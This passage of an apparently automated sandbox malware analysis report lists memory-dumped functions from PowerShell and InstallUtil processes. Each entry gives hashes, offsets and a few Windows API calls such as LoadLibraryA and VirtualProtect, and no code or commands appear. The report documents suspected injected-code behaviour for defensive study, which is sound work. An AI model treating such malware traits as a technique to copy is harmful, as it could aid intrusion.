Opcode Fuzzy Hash: 445721d69ed26314000933d6c1119872dcf0f983deccd27d734c07c008881ec1
Instruction Fuzzy Hash: 3FF06232B0D9AE4FFBA2E65C98156A8B7E0EB55360B5901E7D40CC7172D9199C048781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B31FF Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02419471a7cf70adcce584fabd3bd48028fc201889cd4280395876f1f62ade3
Instruction ID: 820c9c7b26d84afed675a4b6a29cf783fc997dd36a40d693a66f33d95772f605
Opcode Fuzzy Hash: c02419471a7cf70adcce584fabd3bd48028fc201889cd4280395876f1f62ade3
Instruction Fuzzy Hash: D8F0823231CB044FDB08AA1CF8865F573D0E785335B40016EE48AC2267D927E4938681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC981649 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6513da0f9c1e2507642225a3fb4c798fe84cd738cf96bdd3080d890fac3d6b2d
Instruction ID: 093d751e9a58d3ba5e81614e6e431754cef6088197f91792de5f2cecef4edbca
Opcode Fuzzy Hash: 6513da0f9c1e2507642225a3fb4c798fe84cd738cf96bdd3080d890fac3d6b2d
Instruction Fuzzy Hash: 64F08231E1CC1A4FB699D30CB4115B963E2FB88260B5942F6E24DD35AECE16AC114680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B2010 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b56df84063512358843d57fa805e068e036f2f1e545e38c0ebc2d9a9a326d55
Instruction ID: be71e89590ce14e0120706affa713ce596d47fa7bd0dba2412405b663edfbb62
Opcode Fuzzy Hash: 9b56df84063512358843d57fa805e068e036f2f1e545e38c0ebc2d9a9a326d55
Instruction Fuzzy Hash: C1F0303275CA084FDB4CEA1CF8829B5B3D1EB99334F50016EE48BC2697DD27E8528785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC986ED4 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6639176d62ed47524d44c2db1b003ea1dac18d317ba18d07cdfe7bb526c31640
Instruction ID: 7ae1ea42b22c8de9c61e504774c34f8a371dc58f9b279eb63cccb34d08ee3f7e
Opcode Fuzzy Hash: 6639176d62ed47524d44c2db1b003ea1dac18d317ba18d07cdfe7bb526c31640
Instruction Fuzzy Hash: 09F0653171CA088F9B48EB2CE4461B9B3D1FBD9236714427BD18EC7571DB3298128745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC986EBA Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb547aa29a677e5fef3651cb419914cdf709e8eaf1b41a42f64207c7e616628
Instruction ID: 0ef6e032dc03b034583da43492769c11b0aed14db602b4d81c9fa7113304d835
Opcode Fuzzy Hash: 4fb547aa29a677e5fef3651cb419914cdf709e8eaf1b41a42f64207c7e616628
Instruction Fuzzy Hash: 1CF0E57272CA484F9B1CCB0CE8121BA77E1FBC9235704423FD18AC3421C721D4024680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC980F06 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a5d22588726e2a2641c4c281b87e240b58119998e7d22384c94275420ce52a
Instruction ID: 2d61e49158d1e0814974bac64deb35a650aeec82ea57b957481a53ff72f1f75a
Opcode Fuzzy Hash: 52a5d22588726e2a2641c4c281b87e240b58119998e7d22384c94275420ce52a
Instruction Fuzzy Hash: E8F03032F5C92E0FB399D64CB8515F8A3E2EB88371B849377D50ED3661DE216C258380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC98167D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be66384edc54287e50fb4a0a1f90b20482841aa5ff66663969c6f07b235e75f0
Instruction ID: 1f11c6ae61e0d7bb0bdfe5d01b885b0f2bbb05a9605ba05f81cdd8f52c4d801d
Opcode Fuzzy Hash: be66384edc54287e50fb4a0a1f90b20482841aa5ff66663969c6f07b235e75f0
Instruction Fuzzy Hash: 0CE09231F1C8168EB759A70CA0464F9B3E1FF88221B5841B6D24DC757ADE2568528644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9819BE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54af92c38881699e545406d3fee6a6a1c5baadef12ef4f1a4eb06413435a3ca4
Instruction ID: 0250c544f49b0201dece75c7e1bcf23b41c259fe464fd05bfeb5d6ac024d3196
Opcode Fuzzy Hash: 54af92c38881699e545406d3fee6a6a1c5baadef12ef4f1a4eb06413435a3ca4
Instruction Fuzzy Hash: 67E08631A0C8198EF749A74CF0065FC73E1FF44230F1001B7E15EE3062CB1668628644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B7CFC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7029c97a9645b76f6cb4c2423fcac80f2254aaa513b32939af3a5fceec613268
Instruction ID: 6de33ff0e331669d3444af55bd6d2a998ebe8017962f71a85458557650017571
Opcode Fuzzy Hash: 7029c97a9645b76f6cb4c2423fcac80f2254aaa513b32939af3a5fceec613268
Instruction Fuzzy Hash: EBF0303451490D4AEB15AB14C4687E673A3FBD4300F4409B8920E932E6CE355A524B84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC980F1C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57bb41ed70de186a64d2ac6878dbcc3c597c43cee3c2f18fcfb97bbad308c9
Instruction ID: aacc0c056d435d87ca356689671a610c43fc57eb04d346e67ce91bc116f20d90
Opcode Fuzzy Hash: 5b57bb41ed70de186a64d2ac6878dbcc3c597c43cee3c2f18fcfb97bbad308c9
Instruction Fuzzy Hash: A3D0A731E14C2B0BE349D70DD4545BCE3E1FF943107408336A80DD3360CE10AC118680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B7CB9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776af5d594720e8f41c3bbed5be30760ba7b2d1c515da27cb8e86bb3b7b27a8d
Instruction ID: 0c120680170c9025fa0d381b5e44226fb90b62e39a0cec3432cfd17982aaf7a6
Opcode Fuzzy Hash: 776af5d594720e8f41c3bbed5be30760ba7b2d1c515da27cb8e86bb3b7b27a8d
Instruction Fuzzy Hash: A8B09202D5DD2602F592327470120F8B2D04F40220F9114B0EC2C841E6DC4D29A251CE

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 6428, Parent PID: 924COMMON

Execution Graph

Execution Coverage:	18.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	1

Executed Functions

Function 016BDE60 Relevance: 1.6, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<Ul, xrefs: 016BE0AD

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID: <Ul
API String ID: 0-802154676
Opcode ID: d350d04500c5a9134b6ff3b13e4cef427dc165a1536f0c6f958bce567a5159b4
Instruction ID: b653b98ca91c104bbab6dcca513b63b3f0fcd00f74781074753da078519206db
Opcode Fuzzy Hash: d350d04500c5a9134b6ff3b13e4cef427dc165a1536f0c6f958bce567a5159b4
Instruction Fuzzy Hash: 06D18174E002098FCB14DFA8C884AEEFBF6FF48314F15855AE515AB351DB35A986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016B94E0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f729c599c5491124e6eb67c8b65d684ab57feb3f756030dd25617841126b4cf
Instruction ID: caa60b4d335ed541fd6f5a7406a94e879fb6a4d52e30ee2e6f861ae943a180ec
Opcode Fuzzy Hash: 4f729c599c5491124e6eb67c8b65d684ab57feb3f756030dd25617841126b4cf
Instruction Fuzzy Hash: 76B14EB0E00219CFDB14CFA9CC85BEDBBF2AF88318F148529D515A7394EB749885CB81

Uniqueness

Uniqueness Score: -1.00%

Function 016B9DB0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47eee05fa198a10422326f9509bba4bf902b6fe8fca39b542f9f65247eb664cb
Instruction ID: 9d5f35eb63c610e80554c91e0e333c13a67b1db515bb5afc6c0ea586eac4537e
Opcode Fuzzy Hash: 47eee05fa198a10422326f9509bba4bf902b6fe8fca39b542f9f65247eb664cb
Instruction Fuzzy Hash: E3B13EB0E002198FDB14CFA9CC857DDBBF2AF88758F148529E915E7394DB749886CB81

Uniqueness

Uniqueness Score: -1.00%

Function 016B3EA8 Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 016B6AD2

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ad068836fcc5a238258cc5fbc34381966e5ea69090055086f05370ced030b03b
Instruction ID: 4251412900fa94b6b5b4a30008c2165100b9d6b9bedb683b0434199bc5954323
Opcode Fuzzy Hash: ad068836fcc5a238258cc5fbc34381966e5ea69090055086f05370ced030b03b
Instruction Fuzzy Hash: 273110B0D102598FDF14CFAAC885BEEBBF1BB08314F148529E815A7380D7759886CF95

Uniqueness

Uniqueness Score: -1.00%

Function 016B69FC Relevance: 1.6, APIs: 1, Instructions: 88
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 016B6AD2

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8708245c03f5e0ab1abdbe6f583388bb267de1a816c3150851de350555c70688
Instruction ID: e84d8d596c3f443461710068c797750662adf49dd753c3d106f6bd9321d15801
Opcode Fuzzy Hash: 8708245c03f5e0ab1abdbe6f583388bb267de1a816c3150851de350555c70688
Instruction Fuzzy Hash: 293110B5D102598FDF14CFA9C8857EEBBF1BB08318F14852AD815AB380D7799486CF85

Uniqueness

Uniqueness Score: -1.00%

Function 016B158D Relevance: 1.6, APIs: 1, Instructions: 74
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 016B1629

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7e2e787dd0ec93408b73702108b5dd98adfc408a2dbf3eb802dbd0ab7465c440
Instruction ID: feae1c3380931d72e752df871d71777a22bdf0857003595da4351c615387fa92
Opcode Fuzzy Hash: 7e2e787dd0ec93408b73702108b5dd98adfc408a2dbf3eb802dbd0ab7465c440
Instruction Fuzzy Hash: C43103B0D01248EFCB14CF99E594BDEBBF5AF49314F24802AE405AB350DB756986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 016B1598 Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 016B1629

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f74e0b42d87d7abb30f7661cfa7a39957186fe3bbd591669799f7b9c33f170d
Instruction ID: 49644d1033651588960da07d9bb86acfbc210110ad3c77f34c60e60be91f827f
Opcode Fuzzy Hash: 6f74e0b42d87d7abb30f7661cfa7a39957186fe3bbd591669799f7b9c33f170d
Instruction Fuzzy Hash: 1331F2B0D01248EFDB14CF99D594BCEBBF5AF49314F248029E405AB350DB756985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 016B1BF0 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 016B1C6C

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e0c669c03a38da951c0323a827aa3f3df931a52f1a884658ccb6cd2fbb6cab7b
Instruction ID: bf15c86b42a207d27377ca81e77b003425a4bb3195aad20e1a5b6a583d4f3315
Opcode Fuzzy Hash: e0c669c03a38da951c0323a827aa3f3df931a52f1a884658ccb6cd2fbb6cab7b
Instruction Fuzzy Hash: C121E4719042099FDB14DFAAC884AEFFBF5AB88324F14842ED519A7240C7799945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016B1BF8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 016B1C6C

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: db14f3f4cc011e33b45aa053101c9ea1263dea2c9d352f014db34eeacc4e0f18
Instruction ID: e372d85a4f36800fdf32f195aa6dace0ee652b3f2829c0abaefbda4032e90963
Opcode Fuzzy Hash: db14f3f4cc011e33b45aa053101c9ea1263dea2c9d352f014db34eeacc4e0f18
Instruction Fuzzy Hash: F111F4719042099BCB10DFAAC884BEFFBF4AF88324F14842ED519A7240C779A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 014FD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.909797382.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14fd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a8094f7c3734c9b76f82ea6c22d97ab4d5b4e3d2abc5b5cad2f14cf909f20a
Instruction ID: 72ef5c77dcba6c1ba85542b09d9f79efdf74f00e1dd14c13ae1cea952e171950
Opcode Fuzzy Hash: 08a8094f7c3734c9b76f82ea6c22d97ab4d5b4e3d2abc5b5cad2f14cf909f20a
Instruction Fuzzy Hash: 8721F4B2904244DFDB05DF54D8C4B27BF65FB88328F24856EEA094B326C336D856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 014FD3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.909797382.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14fd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f9af225c1dd584c29c968cf4aff4dc7543be02d0eb7b9034169b83455fc468
Instruction ID: 38457cc4c45dbbaf37f049e0dc843a9aa110d08d3db5823a6005ece50789ad7c
Opcode Fuzzy Hash: 89f9af225c1dd584c29c968cf4aff4dc7543be02d0eb7b9034169b83455fc468
Instruction Fuzzy Hash: 3C21F1B2904244DFDB05CF54D8C0B67BB65FB88324F24C57EEA094B366C336E856CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 014FD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.909797382.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14fd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction ID: 5f1a3266a8f2f98ce5f15cdcbad4088632e77df5f75e44dfa66ef4559379f09b
Opcode Fuzzy Hash: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction Fuzzy Hash: 9811AFB6904284CFDB16CF54D9C4B16BF71FB84324F2886AED9050B726C33AD456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 014FD3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.909797382.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14fd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction ID: 83cbf6d500a1c1cd8cff6f8c88bcd11f2d3a4da1949158251899aebe6518a624
Opcode Fuzzy Hash: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction Fuzzy Hash: C211CD76804280CFCB02CF54D9C0B56BF71FB84324F28C6AAD9040B726C336E456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 016BFB08 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

D0Ul, xrefs: 016BFE04

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID: D0Ul
API String ID: 0-2459005316
Opcode ID: 6f9ec6f99c5561e7300362bb655bddbd6de19d7f7ab41411fab16de77e35eb2b
Instruction ID: 82705fbf4d0e4c8138a191bc86fbc391261e2bdb625d78cd3ad7911f32f5bfc6
Opcode Fuzzy Hash: 6f9ec6f99c5561e7300362bb655bddbd6de19d7f7ab41411fab16de77e35eb2b
Instruction Fuzzy Hash: 7981C435B042148BDB18EF749C546BE76B7BFC8704B49886DE566DB389CF348C068B91

Uniqueness

Uniqueness Score: -1.00%

Function 016B9198 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3410a6d2c0f49089bead27d77ca14a840fb27016dcfc397cec27453b160ef02c
Instruction ID: eb4caadc0de15349d1e5f4f235a34057ad175e371d71ead5208531fb2ddb476b
Opcode Fuzzy Hash: 3410a6d2c0f49089bead27d77ca14a840fb27016dcfc397cec27453b160ef02c
Instruction Fuzzy Hash: A2914DB0E042098FDF14CFA9C9857DDBBF2AF88318F148129E615A7394DB749886CF91

Uniqueness

Uniqueness Score: -1.00%

Function 016B71D8 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.910101833.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_16b0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f77ce4ee62818e14b89db5834dcd57416bebe94226dd1b92bb6de3254cb7a28
Instruction ID: e86f84fb4a148fab4e152dc90bbe479702b1f27918bc88d5b53675f50169af82
Opcode Fuzzy Hash: 6f77ce4ee62818e14b89db5834dcd57416bebe94226dd1b92bb6de3254cb7a28
Instruction Fuzzy Hash: 30718D71E053498FDB11CFA8C8917DEBFF1AF85314F14852AD855EB290D7389886CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 1400, Parent PID: 7116COMMON

Executed Functions

Function 02EF1088 Relevance: 3.8, Strings: 3, Instructions: 62COMMON

Download Yara Rule

Strings

TSUl, xrefs: 02EF10C2
WQl, xrefs: 02EF10CE
TSUl, xrefs: 02EF10B6

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID: TSUl$TSUl$WQl
API String ID: 0-1226604806
Opcode ID: b966101d5ecdce121aa37d05a707566778fc0069f82c5eba65ea6c08bce9b98f
Instruction ID: 2ec8c41c1fd50128d1c5e3dabfce75d022c26aa97c0faae1f511ebfb0f9e4c0e
Opcode Fuzzy Hash: b966101d5ecdce121aa37d05a707566778fc0069f82c5eba65ea6c08bce9b98f
Instruction Fuzzy Hash: 0B118130B40208CFDB54EB74C555BAE77E2AF8D248B505478C10AEB790DF3A9D05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EF0E48 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7067f6de1ef6e0bbd298156d43aef1918ed71ff592be55e4824f070a633c0910
Instruction ID: a4701d9fd1fa6511541c832a45ca4a3231204dcde448bccadd7c34d8158e48ff
Opcode Fuzzy Hash: 7067f6de1ef6e0bbd298156d43aef1918ed71ff592be55e4824f070a633c0910
Instruction Fuzzy Hash: F551AC30B002089FCB44EB79C450AAEB7E6AF89304F1494BED545EB745DF34DC458BA6

Uniqueness

Uniqueness Score: -1.00%

Function 02EF0B45 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d685cc2abde1ebfbc07b9402ab37bcb731bb8e1c79e66b5d032740f5c3d367b
Instruction ID: ed8a6cbc67b950b51dd82edecaa30a54effd76f57b6aa49c66ff1f1df3a2ae51
Opcode Fuzzy Hash: 0d685cc2abde1ebfbc07b9402ab37bcb731bb8e1c79e66b5d032740f5c3d367b
Instruction Fuzzy Hash: 91519D70B501048FCB48DB68C454AAEBBF2EF89704F6580AAE505DF7A2DB75DC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EF0721 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965c3b19a0bb04a2afd9f56920562b1abdc86fe2bdbcceb0ba73a9c4ec3b565a
Instruction ID: 73dfce25fc4a21708def0f21aa35701ddf6b90c6ca107beeb664fee45703641b
Opcode Fuzzy Hash: 965c3b19a0bb04a2afd9f56920562b1abdc86fe2bdbcceb0ba73a9c4ec3b565a
Instruction Fuzzy Hash: F051B774640319DFCB94FF28E4858593776FB8D2093918978D802AB264DF7DAD86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EF0998 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013b37771492de3a3d41fccd30fffccdb2fb7ee4eebdb42541df8a4f662f301c
Instruction ID: 665eed252b1063d9054698004b910d5f8fcfbd223bd4079cfc8fcff24f1e51ab
Opcode Fuzzy Hash: 013b37771492de3a3d41fccd30fffccdb2fb7ee4eebdb42541df8a4f662f301c
Instruction Fuzzy Hash: D8419F70B04205CFDB15DF68C454BAEBBF2AF89308F1494AAD142EB7A6CB749C05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EF05E0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184fc2cc08e3364bbbc31bc7ee475ee3daf1ab71b73575e35ca014559656dff6
